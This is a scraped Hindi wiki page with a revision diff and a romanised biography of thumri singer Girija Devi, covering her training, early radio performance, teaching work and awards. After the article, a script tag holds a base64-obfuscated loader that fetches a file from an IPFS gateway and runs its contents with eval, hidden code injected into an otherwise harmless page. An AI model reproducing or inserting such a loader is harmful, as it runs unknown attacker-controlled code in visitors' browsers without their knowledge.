Difference between revisions of "गिरिजा देवी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 37: Line 37:
 
गिरिजा देवी का जन्म 8 मई, 1929 को [[कला]] और [[संस्कृति]] की प्राचीन नगरी वाराणसी (तत्कालीन [[बनारस]]) में हुआ था। उनके [[पिता]] रामदेव राय एक ज़मींदार थे, जो एक संगीत प्रेमी व्यक्ति थे। उन्होंने पाँच वर्ष की आयु में ही गिरिजा देवी के लिए [[संगीत]] की शिक्षा की व्यवस्था कर दी थी। गिरिजा देवी के प्रारम्भिक संगीत गुरु पण्डित सरयू प्रसाद मिश्र थे। नौ वर्ष की आयु में पण्डित श्रीचन्द्र मिश्र से उन्होंने संगीत की विभिन्न शैलियों की शिक्षा प्राप्त की। इस अल्प आयु में ही एक [[हिन्दी]] फ़िल्म 'याद रहे' में गिरिजा ने अभिनय भी किया था।<ref name="mcc">{{cite web |url=http://amittestamit.blogspot.in/2011/07/blog-post_11.html|title=लोक-रस से अभिसिंचित ठुमरी|accessmonthday=6 अक्टूबर|accessyear=2012|last= |first= |authorlink= |format= |publisher= |language=[[हिन्दी]]}}</ref>
 
गिरिजा देवी का जन्म 8 मई, 1929 को [[कला]] और [[संस्कृति]] की प्राचीन नगरी वाराणसी (तत्कालीन [[बनारस]]) में हुआ था। उनके [[पिता]] रामदेव राय एक ज़मींदार थे, जो एक संगीत प्रेमी व्यक्ति थे। उन्होंने पाँच वर्ष की आयु में ही गिरिजा देवी के लिए [[संगीत]] की शिक्षा की व्यवस्था कर दी थी। गिरिजा देवी के प्रारम्भिक संगीत गुरु पण्डित सरयू प्रसाद मिश्र थे। नौ वर्ष की आयु में पण्डित श्रीचन्द्र मिश्र से उन्होंने संगीत की विभिन्न शैलियों की शिक्षा प्राप्त की। इस अल्प आयु में ही एक [[हिन्दी]] फ़िल्म 'याद रहे' में गिरिजा ने अभिनय भी किया था।<ref name="mcc">{{cite web |url=http://amittestamit.blogspot.in/2011/07/blog-post_11.html|title=लोक-रस से अभिसिंचित ठुमरी|accessmonthday=6 अक्टूबर|accessyear=2012|last= |first= |authorlink= |format= |publisher= |language=[[हिन्दी]]}}</ref>
 
====प्रथम प्रदर्शन====
 
====प्रथम प्रदर्शन====
उनका [[विवाह]] [[1946]] में एक व्यवसायी परिवार में हुआ था। उन दिनों कुलीन विवाहिता स्त्रियों द्वारा मंच प्रदर्शन अच्छा नहीं माना जाता था। [[1949]] में गिरिजा देवी ने अपना पहला प्रदर्शन [[इलाहाबाद]] के आकाशवाणी केन्द्र से किया। यह देश की स्वतंत्रता के तत्काल बाद का उन्मुक्त परिवेश था, जिसमें अनेक रूढ़ियाँ टूटी थीं। संगीत के क्षेत्र में पण्डित विष्णु नारायण भातखंडे और पण्डित विष्णु दिगम्बर पलुस्कर ने स्वतंत्रता से पहले ही भारतीय संगीत को जन-जन में प्रतिष्ठित करने का जो आन्दोलन छेड़ रखा था, उसका सार्थक परिणाम देश की आज़ादी के पश्चात तेजी से दृष्टिगोचर होने लगा था।<ref name="mcc"/>
+
उनका [[विवाह]] [[1946]] में एक व्यवसायी परिवार में हुआ था। उन दिनों कुलीन विवाहिता स्त्रियों द्वारा मंच प्रदर्शन अच्छा नहीं माना जाता था। [[1949]] में गिरिजा देवी ने अपना पहला प्रदर्शन [[इलाहाबाद]] के आकाशवाणी केन्द्र से किया। यह देश की स्वतंत्रता के तत्काल बाद का उन्मुक्त परिवेश था, जिसमें अनेक रूढ़ियाँ टूटी थीं। संगीत के क्षेत्र में पण्डित विष्णु नारायण भातखंडे और [[विष्णु दिगम्बर पलुस्कर|पण्डित विष्णु दिगम्बर पलुस्कर]] ने स्वतंत्रता से पहले ही भारतीय संगीत को जन-जन में प्रतिष्ठित करने का जो आन्दोलन छेड़ रखा था, उसका सार्थक परिणाम देश की आज़ादी के पश्चात तेजी से दृष्टिगोचर होने लगा था।<ref name="mcc"/>
 
==संगीत यात्रा==
 
==संगीत यात्रा==
 
गिरिजा देवी को भी अपने युग की रूढ़ियों के विरुद्ध कठिन संघर्ष करना पड़ा। 1949 में आकाशवाणी से अपने गायन का प्रदर्शन करने के बाद उन्होंने [[1951]] में [[बिहार]] के आरा में आयोजित एक संगीत सम्मेलन में गायन प्रस्तुत किया। इसके बाद गिरिजा देवी की अनवरत संगीत यात्रा शुरू हुई, जो आज तक जारी है। गिरिजा जी ने स्वयं को केवल मंच-प्रदर्शन तक ही सीमित नहीं रखा, बल्कि [[संगीत]] के शैक्षणिक और शोध कार्यों में भी अपना योगदान किया। 80 के दशक में उन्हें [[कोलकाता]] स्थित 'आई.टी.सी. संगीत रिसर्च एकेडमी' ने आमंत्रित किया। यहाँ रह कर उन्होंने न केवल कई योग्य शिष्य तैयार किये, बल्कि शोध कार्य भी कराए। 90 के दशक में गिरिजा देवी '[[काशी हिन्दू विश्वविद्यालय]]' से भी जुड़ीं। यहाँ अनेक छात्र-छात्राओं को प्राचीन संगीत परम्परा की दीक्षा दी।
 
गिरिजा देवी को भी अपने युग की रूढ़ियों के विरुद्ध कठिन संघर्ष करना पड़ा। 1949 में आकाशवाणी से अपने गायन का प्रदर्शन करने के बाद उन्होंने [[1951]] में [[बिहार]] के आरा में आयोजित एक संगीत सम्मेलन में गायन प्रस्तुत किया। इसके बाद गिरिजा देवी की अनवरत संगीत यात्रा शुरू हुई, जो आज तक जारी है। गिरिजा जी ने स्वयं को केवल मंच-प्रदर्शन तक ही सीमित नहीं रखा, बल्कि [[संगीत]] के शैक्षणिक और शोध कार्यों में भी अपना योगदान किया। 80 के दशक में उन्हें [[कोलकाता]] स्थित 'आई.टी.सी. संगीत रिसर्च एकेडमी' ने आमंत्रित किया। यहाँ रह कर उन्होंने न केवल कई योग्य शिष्य तैयार किये, बल्कि शोध कार्य भी कराए। 90 के दशक में गिरिजा देवी '[[काशी हिन्दू विश्वविद्यालय]]' से भी जुड़ीं। यहाँ अनेक छात्र-छात्राओं को प्राचीन संगीत परम्परा की दीक्षा दी।

Revision as of 13:46, 9 October 2012

girija devi
poora nam girija devi
janm 8 mee, 1929
janm bhoomi varanasi, uttar pradesh
karm bhoomi bharat
karm-kshetr shastriy gayan
shiksha sangit
puraskar-upadhi 'padmashri (1972), 'sangit natak akadami puraskar' (1977), 'padmabhooshan' (1989), 'rashtriy tanasen samman' (1996)
prasiddhi thumari gayika
vishesh yogadan 90 ke dashak mean ap 'kashi hindoo vishvavidyalay' se bhi ju dian aur anek chhatr-chhatraoan ko prachin sangit parampara ki diksha di.
nagarikata bharatiy
adyatan‎ 1:25, 6 aktoobar-2012 (IST)

girija devi (aangrezi: Girija Devi; janm- 8 mee, 1929, varanasi, uttar pradesh) bharat ki prasiddh thumari gayika haian. unhean 'thumari ki rani' kaha jata hai. ve banaras gharane se sambandhit haian. gayaki ke kshetr mean unake ullekhaniy yogadan ke lie unhean varsh 1972 mean 'padmashri' aur varsh 1989 mean 'padmabhooshan' se sammanit kiya gaya tha. girija devi 'sangit natak akadami' dvara bhi sammanit ki ja chuki haian.

janm tatha shiksha

girija devi ka janm 8 mee, 1929 ko kala aur sanskriti ki prachin nagari varanasi (tatkalin banaras) mean hua tha. unake pita ramadev ray ek zamiandar the, jo ek sangit premi vyakti the. unhoanne paanch varsh ki ayu mean hi girija devi ke lie sangit ki shiksha ki vyavastha kar di thi. girija devi ke prarambhik sangit guru pandit sarayoo prasad mishr the. nau varsh ki ayu mean pandit shrichandr mishr se unhoanne sangit ki vibhinn shailiyoan ki shiksha prapt ki. is alp ayu mean hi ek hindi film 'yad rahe' mean girija ne abhinay bhi kiya tha.[1]

pratham pradarshan

unaka vivah 1946 mean ek vyavasayi parivar mean hua tha. un dinoan kulin vivahita striyoan dvara manch pradarshan achchha nahian mana jata tha. 1949 mean girija devi ne apana pahala pradarshan ilahabad ke akashavani kendr se kiya. yah desh ki svatantrata ke tatkal bad ka unmukt parivesh tha, jisamean anek roodhiyaan tooti thian. sangit ke kshetr mean pandit vishnu narayan bhatakhande aur pandit vishnu digambar paluskar ne svatantrata se pahale hi bharatiy sangit ko jan-jan mean pratishthit karane ka jo andolan chhe d rakha tha, usaka sarthak parinam desh ki azadi ke pashchat teji se drishtigochar hone laga tha.[1]

sangit yatra

girija devi ko bhi apane yug ki roodhiyoan ke viruddh kathin sangharsh karana p da. 1949 mean akashavani se apane gayan ka pradarshan karane ke bad unhoanne 1951 mean bihar ke ara mean ayojit ek sangit sammelan mean gayan prastut kiya. isake bad girija devi ki anavarat sangit yatra shuroo huee, jo aj tak jari hai. girija ji ne svayan ko keval manch-pradarshan tak hi simit nahian rakha, balki sangit ke shaikshanik aur shodh karyoan mean bhi apana yogadan kiya. 80 ke dashak mean unhean kolakata sthit 'aee.ti.si. sangit risarch ekedami' ne amantrit kiya. yahaan rah kar unhoanne n keval kee yogy shishy taiyar kiye, balki shodh kary bhi karae. 90 ke dashak mean girija devi 'kashi hindoo vishvavidyalay' se bhi ju dian. yahaan anek chhatr-chhatraoan ko prachin sangit parampara ki diksha di.

gayan shaili

shastriy aur up-shastriy sangit mean nishnat girija devi ki gayaki mean 'seniya' aur 'banaras gharane' ki adayagi ka vishisht madhury, apani pamparik visheshataoan ke sath vidyaman hai. dhrupad, khyal, tappa, tarana, sadara, thumari aur paramparik lok sangit mean hori, chaiti, kajari, jhoola, dadara aur bhajan ke anoothe pradarshanoan ke sath hi unhoanne thumari ke sahity ka gahan adhyayan aur anusandhan bhi kiya hai. bharatiy shastriy sangit ke samakalin paridrishy mean ve ekamatr aisi varishth gayika haian, jinhean poorab aang ki gayaki ke lie vishvavyapi pratishtha prapt hai. girija devi ne poorabi aang ki kalatmak virasat ko atyant mohak aur saushthavapoorn dhang se udghatit karane ka mahati kam kiya hai. sangit me unaki sudirgh sadhana hindustani shastriy sangit ke mool saundary aur saundaryamoolak aishvary ki pahachan ko adhik paradarshi bhi banakar prakat karati hai.[1]

puraskar v samman

apani vishisht gayan shaili ke lie girija devi ko kee puraskar prapt hue haian-

  1. 'padmashri' - 1972
  2. 'sangit natak akadami puraskar' - 1977
  3. 'padmabhooshan' - 1989
  4. 'sangit natak akadami pheloship' - 2010
  5. 'maha sangit samman avard' - 2012

girija devi adhunik aur svatantrata poorv kal ki poorab aang ki bol-banav thumariyoan ki visheshajn aur sanvahika haian. adhunik upashastriy sangit ke bhandar ko unhoanne samriddh kiya hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. 1.0 1.1 1.2 lok-ras se abhisianchit thumari (hindi). . abhigaman tithi: 6 aktoobar, 2012.

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>